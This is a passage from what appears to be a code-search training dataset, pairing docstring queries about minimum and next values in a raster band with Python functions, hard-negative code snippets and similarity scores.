self._product.get_data_config_json()[\"_value_fan_limits\"][\n ((fan - 1) * 2)\n ]\n elif self._type == \"fan3\":\n fan = 3\n return self._product.get_data_config_json()[\"_value_fan_limits\"][\n ((fan - 1) * 2)\n ]", "def getMinValue(self):\n return self.MIN_VALUE", "def min_value(self) -> Union[int, float]:\n return self.left_boundary['value']", "def get_min(self):\n return self.serie.min()", "def get_min(self):\n\t\tif self.left:\n\t\t\treturn self.left.get_min()\n\t\treturn self.value", "def min(self) -> Union[float, int, str]:\n return self._data.min()", "def min(self):\n return self._min", "def min(self):\n return self._min", "def min(self):\n return self.__min", "def min(self):\r\n return np.min(self.data_array)", "def find_min(self):\n return self.min", "def find_min(self):\n return self.min", "def min(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"min\")", "def min(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"min\")", "def min(self):\n return numpy.ma.min(self.data)", "def min_value(self) -> float:\n return DEFAULT_MIN_VALUE", "def minimum(self) -> Union[int, float]:\n return self.range[0]", "def min(self):\r\n\t\treturn min(self.sample)", "def min(self):\n return min(self)", "def min(self):\n least = self.data[0]\n \n for i in range(len(self.data)):\n if self.data[i] < least:\n least = self.data[i]\n return least", "def minimum(self):\n return self.properties.get('minimum')", "def min(self):\n return self._reduce_for_stat_function(F.min, only_numeric=False)", "def native_min_value(self) -> float:\n return TEMP_MINIMUM", "def min(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"min\")", "def min(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"min\")", "def Min(data):\n return data.min()", "def min(self):\n return self.get_first()", "def getmin(self):\n\n return self.X", "def min(self) -> float:\n return stats.min(self)", "def native_min_value(self) -> float:\n return -9", "def get_min(self):\r\n df = pd.read_csv(\"MonthlyRate.csv\")\r\n df = df[df.CurrencyCode == self.choice]\r\n minimum = df.min(axis=1).values[0]\r\n # Round the value to 4 d.p.\r\n minimum = round(float(minimum), 4)\r\n return minimum", "def min_flux(self):\n return np.min(self.flux)", "def _minimum(self) -> float:\n return self._config[CONF_MIN]", "def getMinValue(self):\n if self.left is None:\n return self.data\n return self.left.getMinValue()", "def get_min_value(self, dim):\n return self._min_values[dim]", "def get_min(self):\n if not self:\n return None\n return self.left.get_min() if self.left else self.value #Ternarary Operator", "def native_min_value(self) -> float:\n return self._device.min_offset", "def x_min(self):\n return self.get_min_value(self.X_INDEX)", "def get_min(self):\n min_value= self.df[self.col_name].min()\n return min_value", "def z_min(self):\n return self.get_min_value(self.Z_INDEX)", "def get_min(self):\n raise NotImplementedError(\"This is an abstract method and needs to be implemented in derived classes.\")", "def min():\n return KeeperOfMinOrMax(int.__gt__)", "def minimum(self):\n return min(self.numbers)", "def min(self):\n a = self.array_form\n min = len(a)\n for i in xrange(len(a)):\n if a[i] != i and a[i] < min:\n min = a[i]\n return min", "def min(self):\n if 0 in type(self).flatten_shape(self.shape):\n raise ValueError(\"zero-size array has no minimum\")\n if self.isscalar():\n return self.defval\n # If not all blocks are set, then the tensor has an element of defval\n # somewhere.\n m = np.inf if self.is_full() else self.defval\n for v in self.sects.values():\n try:\n m = min(m, np.min(v))\n except ValueError:\n # This block was zero-size, and has no elements.\n pass\n return m", "def state_min(self) -> float:\n raise NotImplementedError", "def cmin(self):\n return self[\"cmin\"]", "def cmin(self):\n return self['cmin']", "def accepted_minimum(self):\n\n return self._get_value(self.accepted_minimum_provider)", "def get_f_minimum(self):\n return np.min(self._Y)", "def min_value(dtype):\n return _api_internal._min_value(dtype)", "def minX(self):\n return min(self.getx())", "def take_min(self):\n return self.get_first()", "def peek_min(self):\n if self.root:\n return self.root.min().value\n raise ValueError(\"cannot perform peek_min on an empty tree\")", "def min(self) -> \"Stream[float]\":\n return self.agg(np.min).astype(\"float\")", "def GetMinimum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUL3_GetMinimum(self)", "def find_min(self):\n return min(self.nodes, key=int)", "def get_min(cls, data: tuple or list) -> float:\n cls._data_validation(data)\n return min(data)", "def getMin(self, field): \n return np.min([self.fitnesses[i][field] for i in range(len(self.fitnesses))])", "def GetMinimum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUL2_GetMinimum(self)", "def x_min(self) -> ir.FloatingValue:\n return ops.GeoXMin(self).to_expr()", "def getMinX(self):\n return self.minx", "def get_fmin(self):\n return self.model.predict(self.model.X)[0].min()", "def potential_min(self):\n\n return self._args.min", "def GetMinimum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUS3_GetMinimum(self)", "def vmin(self):\n return self._vmin", "def extractMinimum(self):\n\n return self.heap[1]", "def min(self):\n raise NotImplementedError('must be implemented by subclass')", "def min(self):\n raise NotImplementedError('must be implemented by subclass')", "def find_min(self):\n\n if self.left:\n return self.left.find_min()\n\n return self.data", "def get_tmin(self):\n tmin = min(sorted(self.srcData.keys()))\n return tmin", "def userMinimum(self) -> float:\n return self._user_minimum", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def min(self) -> FrameLike:\n return super().min()", "def min(self) -> FrameLike:\n return super().min()", "def min(self) -> FrameLike:\n return super().min()", "def min(self) -> FrameLike:\n return super().min()", "def minimum_number(self):\n return self._minimum_number", "def GetMinimum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUS2_GetMinimum(self)", "def min_level(self):\n return self.__min", "def min(self):\n return self._summarize(DataFrameCpu._cmin)", "def min_rec(self):\n return self._min_rec", "def GetMinimum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUC3_GetMinimum(self)", "def min(self):\n return self._min_coords", "def _min_in_bounds(self, min):\n if min <= self.valmin:\n if not self.closedmin:\n return self.val[0]\n min = self.valmin\n\n if min > self.val[1]:\n min = self.val[1]\n return self._stepped_value(min)", "def min(self):\n return self.heap[1]" ]
[ "0.7944226", "0.7944226", "0.7937631", "0.78972983", "0.7884411", "0.78611416", "0.7846386", "0.7778144", "0.77733576", "0.7762124", "0.7680303", "0.7642864", "0.75792414", "0.75792414", "0.75784636", "0.7551094", "0.75474113", "0.75474113", "0.7521111", "0.7521111", "0.74849975", "0.7484885", "0.7471194", "0.7461117", "0.74487036", "0.7446084", "0.744392", "0.74194586", "0.7390895", "0.73744524", "0.73744524", "0.73413813", "0.7310355", "0.7296167", "0.7289322", "0.7249265", "0.7248786", "0.72440404", "0.7236522", "0.7224943", "0.72162694", "0.72142404", "0.7209117", "0.71570104", "0.7145454", "0.714173", "0.71323127", "0.7109216", "0.70772934", "0.70617133", "0.70600265", "0.70433307", "0.7028071", "0.70215166", "0.70111954", "0.6988008", "0.69834995", "0.6979648", "0.6968356", "0.69448626", "0.694202", "0.69383395", "0.69209516", "0.6905302", "0.6903685", "0.6900909", "0.6896162", "0.6874685", "0.6870821", "0.6850932", "0.68279237", "0.6827528", "0.6824322", "0.68122953", "0.68122953", "0.68073714", "0.68069035", "0.6802727", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67865294", "0.67865294", "0.67865294", "0.67865294", "0.67847824", "0.67812485", "0.6780029", "0.6770788", "0.6767305", "0.6761661", "0.67479265", "0.6722724", "0.67219627" ]
0.7393505
28
Returns the minimum value that can be stored in this band
def MaximumValue(self): datatype = self.NumPyDataType if issubclass(datatype, numpy.integer): return numpy.iinfo(datatype).max elif issubclass(datatype, numpy.floating): return numpy.inf else: raise TypeError("Cannot handle DataType: {0}".format(datatype))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def min(self):\n if self.kind == 'u':\n return 0\n else:\n try:\n val = iinfo._min_vals[self.key]\n except KeyError:\n val = int(-(1 << (self.bits-1)))\n iinfo._min_vals[self.key] = val\n return val", "def min(self):\n if self.kind == 'u':\n return 0\n else:\n try:\n val = iinfo._min_vals[self.key]\n except KeyError:\n val = int(-(1 << (self.bits-1)))\n iinfo._min_vals[self.key] = val\n return val", "def _get_minimum(self):\n return self._minimum", "def minimum_value(self):\n return self._fitness[self._minidx]", "def MinimumValue(self):\n return self._fitness[self._minIndex]", "def _get_minimum_value(self):\n if hasattr(self, '_minimum_value'):\n return self._minimum_value\n return None", "def _minimum(self) -> float:\n if self._type == \"power\":\n return 1.0\n elif self._type == \"setpoint\":\n return self._product.get_data_config_json()[\"_value_setpoint_min\"]\n elif self._type == \"fan1\":\n fan = 1\n return self._product.get_data_config_json()[\"_value_fan_limits\"][\n ((fan - 1) * 2)\n ]\n elif self._type == \"fan2\":\n fan = 2\n return self._product.get_data_config_json()[\"_value_fan_limits\"][\n ((fan - 1) * 2)\n ]\n elif self._type == \"fan3\":\n fan = 3\n return self._product.get_data_config_json()[\"_value_fan_limits\"][\n ((fan - 1) * 2)\n ]", "def getMinValue(self):\n return self.MIN_VALUE", "def min_value(self) -> Union[int, float]:\n return self.left_boundary['value']", "def get_min(self):\n return self.serie.min()", "def get_min(self):\n\t\tif self.left:\n\t\t\treturn self.left.get_min()\n\t\treturn self.value", "def min(self) -> Union[float, int, str]:\n return self._data.min()", "def min(self):\n return self._min", "def min(self):\n return self._min", "def min(self):\n return self.__min", "def min(self):\r\n return np.min(self.data_array)", "def find_min(self):\n return self.min", "def find_min(self):\n return self.min", "def min(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"min\")", "def min(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"min\")", "def min(self):\n return numpy.ma.min(self.data)", "def min_value(self) -> float:\n return DEFAULT_MIN_VALUE", "def minimum(self) -> Union[int, float]:\n return self.range[0]", "def min(self):\r\n\t\treturn min(self.sample)", "def min(self):\n return min(self)", "def min(self):\n least = self.data[0]\n \n for i in range(len(self.data)):\n if self.data[i] < least:\n least = self.data[i]\n return least", "def minimum(self):\n return self.properties.get('minimum')", "def min(self):\n return self._reduce_for_stat_function(F.min, only_numeric=False)", "def MinimumValue(self):\n datatype = self.NumPyDataType\n if issubclass(datatype, numpy.integer):\n return numpy.iinfo(datatype).min\n elif issubclass(datatype, numpy.floating):\n return -numpy.inf\n else:\n raise TypeError(\"Cannot handle DataType: {0}\".format(datatype))", "def native_min_value(self) -> float:\n return TEMP_MINIMUM", "def min(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"min\")", "def min(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"min\")", "def Min(data):\n return data.min()", "def min(self):\n return self.get_first()", "def getmin(self):\n\n return self.X", "def min(self) -> float:\n return stats.min(self)", "def native_min_value(self) -> float:\n return -9", "def get_min(self):\r\n df = pd.read_csv(\"MonthlyRate.csv\")\r\n df = df[df.CurrencyCode == self.choice]\r\n minimum = df.min(axis=1).values[0]\r\n # Round the value to 4 d.p.\r\n minimum = round(float(minimum), 4)\r\n return minimum", "def min_flux(self):\n return np.min(self.flux)", "def _minimum(self) -> float:\n return self._config[CONF_MIN]", "def getMinValue(self):\n if self.left is None:\n return self.data\n return self.left.getMinValue()", "def get_min_value(self, dim):\n return self._min_values[dim]", "def get_min(self):\n if not self:\n return None\n return self.left.get_min() if self.left else self.value #Ternarary Operator", "def native_min_value(self) -> float:\n return self._device.min_offset", "def x_min(self):\n return self.get_min_value(self.X_INDEX)", "def get_min(self):\n min_value= self.df[self.col_name].min()\n return min_value", "def z_min(self):\n return self.get_min_value(self.Z_INDEX)", "def get_min(self):\n raise NotImplementedError(\"This is an abstract method and needs to be implemented in derived classes.\")", "def min():\n return KeeperOfMinOrMax(int.__gt__)", "def minimum(self):\n return min(self.numbers)", "def min(self):\n a = self.array_form\n min = len(a)\n for i in xrange(len(a)):\n if a[i] != i and a[i] < min:\n min = a[i]\n return min", "def min(self):\n if 0 in type(self).flatten_shape(self.shape):\n raise ValueError(\"zero-size array has no minimum\")\n if self.isscalar():\n return self.defval\n # If not all blocks are set, then the tensor has an element of defval\n # somewhere.\n m = np.inf if self.is_full() else self.defval\n for v in self.sects.values():\n try:\n m = min(m, np.min(v))\n except ValueError:\n # This block was zero-size, and has no elements.\n pass\n return m", "def state_min(self) -> float:\n raise NotImplementedError", "def cmin(self):\n return self[\"cmin\"]", "def cmin(self):\n return self['cmin']", "def accepted_minimum(self):\n\n return self._get_value(self.accepted_minimum_provider)", "def get_f_minimum(self):\n return np.min(self._Y)", "def min_value(dtype):\n return _api_internal._min_value(dtype)", "def minX(self):\n return min(self.getx())", "def take_min(self):\n return self.get_first()", "def peek_min(self):\n if self.root:\n return self.root.min().value\n raise ValueError(\"cannot perform peek_min on an empty tree\")", "def min(self) -> \"Stream[float]\":\n return self.agg(np.min).astype(\"float\")", "def GetMinimum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUL3_GetMinimum(self)", "def find_min(self):\n return min(self.nodes, key=int)", "def get_min(cls, data: tuple or list) -> float:\n cls._data_validation(data)\n return min(data)", "def getMin(self, field): \n return np.min([self.fitnesses[i][field] for i in range(len(self.fitnesses))])", "def GetMinimum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUL2_GetMinimum(self)", "def x_min(self) -> ir.FloatingValue:\n return ops.GeoXMin(self).to_expr()", "def getMinX(self):\n return self.minx", "def get_fmin(self):\n return self.model.predict(self.model.X)[0].min()", "def potential_min(self):\n\n return self._args.min", "def GetMinimum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUS3_GetMinimum(self)", "def vmin(self):\n return self._vmin", "def extractMinimum(self):\n\n return self.heap[1]", "def min(self):\n raise NotImplementedError('must be implemented by subclass')", "def min(self):\n raise NotImplementedError('must be implemented by subclass')", "def find_min(self):\n\n if self.left:\n return self.left.find_min()\n\n return self.data", "def get_tmin(self):\n tmin = min(sorted(self.srcData.keys()))\n return tmin", "def userMinimum(self) -> float:\n return self._user_minimum", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def minimum(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum\")", "def min(self) -> FrameLike:\n return super().min()", "def min(self) -> FrameLike:\n return super().min()", "def min(self) -> FrameLike:\n return super().min()", "def min(self) -> FrameLike:\n return super().min()", "def minimum_number(self):\n return self._minimum_number", "def GetMinimum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUS2_GetMinimum(self)", "def min_level(self):\n return self.__min", "def min(self):\n return self._summarize(DataFrameCpu._cmin)", "def min_rec(self):\n return self._min_rec", "def GetMinimum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUC3_GetMinimum(self)", "def min(self):\n return self._min_coords", "def _min_in_bounds(self, min):\n if min <= self.valmin:\n if not self.closedmin:\n return self.val[0]\n min = self.valmin\n\n if min > self.val[1]:\n min = self.val[1]\n return self._stepped_value(min)", "def min(self):\n return self.heap[1]" ]
[ "0.7944226", "0.7944226", "0.7937631", "0.78972983", "0.7884411", "0.78611416", "0.7846386", "0.7778144", "0.77733576", "0.7762124", "0.7680303", "0.7642864", "0.75792414", "0.75792414", "0.75784636", "0.7551094", "0.75474113", "0.75474113", "0.7521111", "0.7521111", "0.74849975", "0.7484885", "0.7471194", "0.7461117", "0.74487036", "0.7446084", "0.744392", "0.74194586", "0.7393505", "0.7390895", "0.73744524", "0.73744524", "0.73413813", "0.7310355", "0.7296167", "0.7289322", "0.7249265", "0.7248786", "0.72440404", "0.7236522", "0.7224943", "0.72162694", "0.72142404", "0.7209117", "0.71570104", "0.7145454", "0.714173", "0.71323127", "0.7109216", "0.70772934", "0.70617133", "0.70600265", "0.70433307", "0.7028071", "0.70215166", "0.70111954", "0.6988008", "0.69834995", "0.6979648", "0.6968356", "0.69448626", "0.694202", "0.69383395", "0.69209516", "0.6905302", "0.6903685", "0.6900909", "0.6896162", "0.6874685", "0.6870821", "0.6850932", "0.68279237", "0.6827528", "0.6824322", "0.68122953", "0.68122953", "0.68073714", "0.68069035", "0.6802727", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67865294", "0.67865294", "0.67865294", "0.67865294", "0.67847824", "0.67812485", "0.6780029", "0.6770788", "0.6767305", "0.6761661", "0.67479265", "0.6722724", "0.67219627" ]
0.0
-1
Returns the next `value` expressible in this band
def IncrementValue(self, value): datatype = self.NumPyDataType if issubclass(datatype, numpy.integer): if not isinstance(value, (int, numpy.integer)): raise TypeError( 'value {0!r} must be compatible with {1}'.format( value, datatype.__name__ ) ) iinfo = numpy.iinfo(datatype) minint, maxint = iinfo.min, iinfo.max if not minint <= value <= maxint: raise ValueError( 'value {0!r} must be between {1} and {2}'.format( value, minint, maxint ) ) if value == maxint: return maxint return value + 1 elif issubclass(datatype, numpy.floating): if not isinstance(value, (int, numpy.integer, float, numpy.floating)): raise TypeError( "value {0!r} must be compatible with {1}".format( value, datatype.__name__ ) ) if value == numpy.finfo(datatype).max: return numpy.inf return numpy.nextafter(datatype(value), datatype(numpy.inf)) else: raise TypeError("Cannot handle DataType: {0}".format(datatype))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_next(self) -> float:\n return self._current + self._offset", "def get_next(self) -> int:\n return self._current * self._step + self._offset", "def value(self):\n current_value = self.initial_value * self.schedule(self.step / self.nvalues)\n self.step += 1.\n return current_value", "def get_next():\n return \"some_value\"", "def get_next(self):\n\t\tassert(len(self.past_values) < 256**3)\n\t\twhile self.advance_state() in self.past_values:\n\t\t\tpass\n\t\tself.past_values.add(self.state)\n\t\treturn self.state", "def nextVal(self, n):\n stream = self.stream\n\n stream.append(n) # appends on the right\n\n streamlength = len(stream)\n if streamlength > self.period:\n stream.popleft()\n streamlength -= 1\n if streamlength == 0:\n self.value = 0\n else:\n self.value = sum( stream ) / float( streamlength )\n\n return self.value", "def peek(self):\n return self.next_val", "def get_next(current):\n return 0.5 * (current + n / current)", "def next(self) -> int:\n node = self.stack.pop()\n ans = node.val \n self._sink(node.right)\n return ans", "def next_value(self):\n self._lock.acquire()\n try:\n id = self._next_id\n self._next_id += 1\n finally:\n self._lock.release()\n return id", "def next(self) -> int:\n value = self.inorder[self.index]\n self.index = self.index + 1\n return value", "def next(self):\n return self.cycle.next()", "def get_next(self) -> int:\n cur_next = self._bin_iter.get_next()\n\n return self._intvs.get_next(cur_next, self.even)", "def get_next(self):\n try:\n return self.the_input[self.index]\n except IndexError:\n return None", "def find_next(self, v):\n if v + 1 < self.values[0] or v + 1 > self.values[-1]:\n raise IndexError('element not found')\n\n index = self._bin_search_recursive(v, 0, len(self.values) - 1)\n\n if index < len(self.values) - 1:\n return self.values[index + 1]\n else:\n raise IndexError('element not found')", "def next(self):\n if self.signbit.dec_value == 1:\n method = 'prev'\n else:\n method = 'next'\n return self._step(method)", "def propose_next(self):\n if self._nvalue > 1 and not self.frozen:\n self._proposednextindex = random_walk_nextindex(\n self._currentindex, self._nvalue, neighborhoods=self._neighborhoods)\n else:\n self._proposednextindex = self._currentindex\n return self.values[self._proposednextindex]", "def first_value(self):\n return self._start", "def _value(self):\n return self.device.value(*self._id[1:])", "def __next__(self):\n if self._current is None:\n raise StopIteration()\n else:\n answer = self._current # hold prev value of _current\n self._advance() # update _current to next value in the\n #progression\n return answer", "def value(self):\n return self.head", "def next(self) -> int:\n self.idx += 1\n return self.m[self.idx]", "def next(self) -> int:\n self.idx += 1\n return self.m[self.idx]", "def __next__(self):\n\n # pointer is the current value\n # counter is an item next to pointer\n # take value from pointer position and reduce\n # counter until counter is not 0\n # if counter == 0 move pointer to the next position\n # with value (stride=2)\n if self.counter <= 0:\n # move pointer to the next item\n self.pointer += 2\n try:\n # take counter\n self.counter = self.data[self.pointer + 1]\n except IndexError:\n raise StopIteration\n\n # take value from pointer position and reduce counter\n value = self.data[self.pointer]\n self.counter -= 1\n\n return value", "def nextValue( self, connection ):\n\t\tif getattr(self.schema,'defaultValue',None):\n\t\t\tfor row in sqlquery.SQLQuery(\n\t\t\t\t\"\"\"SELECT %(value)s\"\"\"\n\t\t\t)( connection, value = self.schema.defaultValue ):\n\t\t\t\treturn row[0]\n\t\tif getattr(self.schema,'sequenceName',None):\n\t\t\t# this is postgresql specific\n\t\t\tfor row in sqlquery.SQLQuery(\n\t\t\t\t\"\"\"SELECT nextval(%%(sequenceName)s)\"\"\"\n\t\t\t)( connection, sequenceName = self.schema.sequenceName ):\n\t\t\t\treturn row[0]\n\t\traise AttributeError(\n\t\t\t\"\"\"Sorry, don't seem to have a default value or sequence name for %s\"\"\"%(\n\t\t\t\tself.schema.name,\n\t\t\t)\n\t\t)", "def first_value(self):\n return self._value", "def next(self):\n if self.pointer > len(self.queue) - 1:\n self.pointer = 0\n raise StopIteration\n val = self.queue[self.pointer]\n self.pointer += 1\n return val", "def next(self):\n return self.from_date(self.date_b)", "def next(self):\n return self.my_next", "def get(self, index: int) -> int:\n if index + 1 >self.cnt:\n return -1\n\n tmp = self.dummy\n for i in range(index+1):\n tmp = tmp.next\n return tmp.val", "def get_next(self):\n return self.next", "def get_next(self):\n return self.next", "def next(self) -> int:\n node = self.stack.pop()\n self.push_lefts(node.right)\n return node.val", "def value(self):\n if hasattr(self, '_m_value'):\n return self._m_value if hasattr(self, '_m_value') else None\n\n self._m_value = (((((((self.groups[0].value + ((self.groups[1].value << 7) if self.len >= 2 else 0)) + ((self.groups[2].value << 14) if self.len >= 3 else 0)) + ((self.groups[3].value << 21) if self.len >= 4 else 0)) + ((self.groups[4].value << 28) if self.len >= 5 else 0)) + ((self.groups[5].value << 35) if self.len >= 6 else 0)) + ((self.groups[6].value << 42) if self.len >= 7 else 0)) + ((self.groups[7].value << 49) if self.len >= 8 else 0))\n return self._m_value if hasattr(self, '_m_value') else None", "def __next__(self):\n if self.returned >= len(self):\n raise StopIteration\n else:\n val = self.buffer[self.current]\n self.current = (self.current + 1) % len(self.buffer)\n self.returned += 1\n return val", "def value(self, step):\n raise NotImplementedError", "def getNext(self):\n\t\t\treturn self.next", "def first_value(self):\n if not self.is_empty():\n return self.data[self.head]\n return None", "def next(self):\n self.lock.acquire()\n self.count += self.step;\n result = self.count\n self.lock.release()\n return result", "def Value(self) -> _n_0_t_14:", "def first_value(self):\n return 0", "def getNext(self):", "def __next__(self):\n self._iteration_index += 1\n if self._iteration_index < self._length:\n return self._child_values[self._iteration_index]\n raise StopIteration", "def next(self, _event):\n self.set_val(self.val + 1)", "def next(self):\n temp = self.n\n try:\n self.n = next(self.g)\n except Exception as e:\n self._hasNext = False\n return temp", "def value_at(self, index):\n if index==0:\n return self.head.val\n\n temp_node = self.head\n for _ in range(index):\n temp_node = temp_node.next\n return temp_node.val", "def getNextValue(self):\n\n if self.si >= len(self.str):\n return -1\n\n # First, count the number of zero chunks until we come to a nonzero chunk.\n zeroCount = 0\n b = ord(self.str[self.si])\n if self.zero_expands:\n bmask = (1 << self.n) - 1\n bv = b & (bmask << (self.bi - self.n))\n while bv == 0:\n zeroCount += 1\n self.bi -= self.n\n if self.bi <= 0:\n self.si += 1\n self.bi = 8\n if self.si >= len(self.str):\n return -1\n\n b = ord(self.str[self.si])\n bv = b & (bmask << (self.bi - self.n))\n\n # Infer from that the number of chunks, and hence the number\n # of bits, that make up the value we will extract.\n numChunks = (zeroCount + 1)\n bitCount = numChunks * self.n\n\n # OK, now we need to extract the next bitCount bits into a word.\n result = 0\n while bitCount >= self.bi:\n mask = (1 << self.bi) - 1\n value = (b & mask)\n result = (result << self.bi) | value\n bitCount -= self.bi\n\n self.si += 1\n self.bi = 8\n if self.si >= len(self.str):\n b = 0\n break\n\n b = ord(self.str[self.si])\n\n if bitCount > 0:\n # A partial word in the middle of the byte.\n bottomCount = self.bi - bitCount\n assert bottomCount > 0\n mask = ((1 << bitCount) - 1)\n value = ((b >> bottomCount) & mask)\n result = (result << bitCount) | value\n self.bi -= bitCount\n\n return result", "def getNext(self):\n return self.__next", "def get_next(self):\n return self._next_previous_helper('next')", "def get_next(self):\n return self.cur_node.next.data", "def next(self):\n node = self.stack.pop()\n self.pushLeft(node.right)\n return node.val", "def next(self) -> int:\n while (self.stack or self.node):\n if self.node:\n self.stack.append(self.node)\n self.node = self.node.left\n else:\n self.node = self.stack.pop()\n res = self.node.val\n self.node = self.node.right\n return res", "def next(self) -> int:\n node = self.stack.pop()\n if node.right:\n self.leftMost(node.right)\n \n return node.val", "def __next__(self) -> object:\n if not self.current_node:\n raise StopIteration\n\n current_node_value = self.current_node.value()\n self.current_node = self.current_node.next()\n return current_node_value", "def first_value(self):\n return self.samples[0]", "def values(self):\n while True:\n try:\n yield self.value\n except GPIODeviceClosed:\n break", "def get_next_keystream_value(deck_of_cards):\n get_big_joker_value(deck_of_cards)\n get_small_joker_value(deck_of_cards)\n move_small_joker(deck_of_cards)\n move_big_joker(deck_of_cards)\n triple_cut(deck_of_cards)\n insert_top_to_bottom(deck_of_cards)\n keystream_value = get_card_at_top_index(deck_of_cards)\n \n if keystream_value == get_big_joker_value(deck_of_cards) or \\\n keystream_value == get_small_joker_value(deck_of_cards):\n keystream_value = get_next_keystream_value(deck_of_cards)\n return keystream_value\n\t\n # Condition where if keystream_value is equal to big_joker_value or\n # small_joker_value then this will be repeated. After occuring it is then \n # checked again to see if keystream_value is equal to big_joker_value or\n # small_joker_value. If so, then again repeated until not so.", "def get_next_sample(self):", "def peg(self):\n return self._val", "def read(self):\n return self.comp.getNextValue()", "def get_flow_value(self):\n valve = self.valve\n if isinstance(valve, (float, int)):\n flow_val = valve\n elif isinstance(valve, Iterable):\n flow_val = next(valve)\n else:\n raise NotImplementedError(f\"Flow value for valve type {type(valve)} not implemented\")\n return flow_val", "def first_value(self):\n return self._waveforms[0].first_value", "def get(self, index):\n if index < 0 or index >= self.length:\n return -1\n curr = self.head\n for i in range(1, index + 1):\n curr = curr.next\n return curr.val", "def next(self):\n return self._next", "def step(self):\n try:\n return next(self.generator)\n except StopIteration:\n return None", "def get_current_value(self):\n assert(self.is_started())\n return self.currValue", "def next(self) -> int:\n top = self.stack.pop()\n temp = top.right;\n while temp:\n self.stack.append(temp)\n temp = temp.left\n\n return top.val", "def next_candidate():\r\n candidate_bidder = -1\r\n candidate_value = -1\r\n for n in range(len(bidders)):\r\n if (is_active[n] == 0 and cur_value(n) is not None\r\n and cur_value(n) > max(candidate_value, cur_bid)):\r\n candidate_value = bidders[n].values[cur_value_idx[n]]\r\n candidate_bidder = n\r\n return candidate_value, candidate_bidder", "def get(self, index):\n count = 0\n x = self.begin\n\n while count != index:\n x = x.next\n count += 1\n\n return x.value", "def get_next(self):\n try:\n g = next(self.__gnext)\n except StopIteration:\n return None\n\n return g", "def __getitem__(self, value) -> Node:\n self.value = value\n self.next_value = None\n if value in map(lambda x: x.value, self.nodes):\n return value\n\n else:\n return False", "def next(self) -> int:\n node = self.list.pop()\n t = node.right\n while (t):\n self.list.append(t)\n t = t.left\n\n return node.val", "def _get_value(self):\n \n return self._value", "def dereference_value(self, value: int) -> int:\n if self.is_register(value):\n return self[value]\n\n return value", "def lazy_value(self):\n\n if self.state == Node.State.VALID:\n return self.value\n else:\n return None", "def get_next_signal(self):\n row, col = -1, -1\n while row == -1 and col == -1:\n row, col = self.do_polling()\n sleep(10/1000)\n return self.get_symbol(row, col)", "def get_next_parameter(self, name, value, settings, id=0):\n return None", "def value(t):\r\n return t(0)", "def next(self) -> int:\n top = self.stack.pop()\n if top.right:\n t = top.right\n while t:\n self.stack.append(t)\n t = t.left\n return top.val", "def next(self) -> object:\n return self._next", "def next(self, initial):", "def get_next(self, buf):\n if buf is None:\n return None, None, None\n err = _ffi.new(\"JError_t *\")\n p = _cjudy.JudySLNext(self._array[0], buf, err)\n return self._cast(buf, err, p)", "def getNext(self):\n return self.__next__", "def next(self):\r\n rnd = rand() * self.totals[(-1)]\r\n return bisect.bisect_right(self.totals, rnd)", "def __next__(self):\n\t\treturn next()", "def _next_interval(self):\n return self.interval_generator()", "def next(self) -> int:\n self.index += 1\n return self.nodes_sorted[self.index]", "def __next__(self):\n return self.next()", "def __next__(self):\n return self.next()", "def __next__(self):\n return self.next()", "def getValue(self, state):\n return self.values[state]", "def get(self, index):\n if index < 0 or index >= self._size:\n return -1\n\n current = self._head\n for _ in range(index):\n current = current.next\n return current.val", "def get_next_if_any(self):\n try:\n ret = self.work[deepcopy(self.i)]\n self.i += 1\n # print \"Trickling item\", self.i\n return 